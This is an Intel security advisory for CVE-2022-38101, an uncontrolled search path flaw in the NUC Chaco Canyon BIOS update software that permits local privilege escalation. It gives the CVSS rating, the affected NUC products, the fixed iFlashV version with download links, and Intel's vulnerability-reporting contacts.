CVEID: CVE-2022-38101

Description: Uncontrolled search path in some Intel(R) NUC Chaco Canyon BIOS update software before version iFlashV Windows 5.13.00.2105 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

Intel® NUC 8 Rugged Kit NUC8CCHKR.

Intel® NUC Board NUC8CCHB.

**Recommendations:**

Intel recommends updating Intel® NUC Chaco Canyon BIOS update software to version iFlashV Windows 5.13.00.2105 or later.

Updates are available for download at these locations:

https://downloadmirror.intel.com/646815/iFlashV.zip

https://www.intel.com/content/www/us/en/download/19504

**Acknowledgements:**

Intel would like to thank Amin for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

05/09/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

© Intel Corporation.  Intel, the Intel logo, and other Intel marks are trademarks of Intel Corporation or its subsidiaries United States and other countries.  Other names and brands may be claimed as the property of others.

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#windows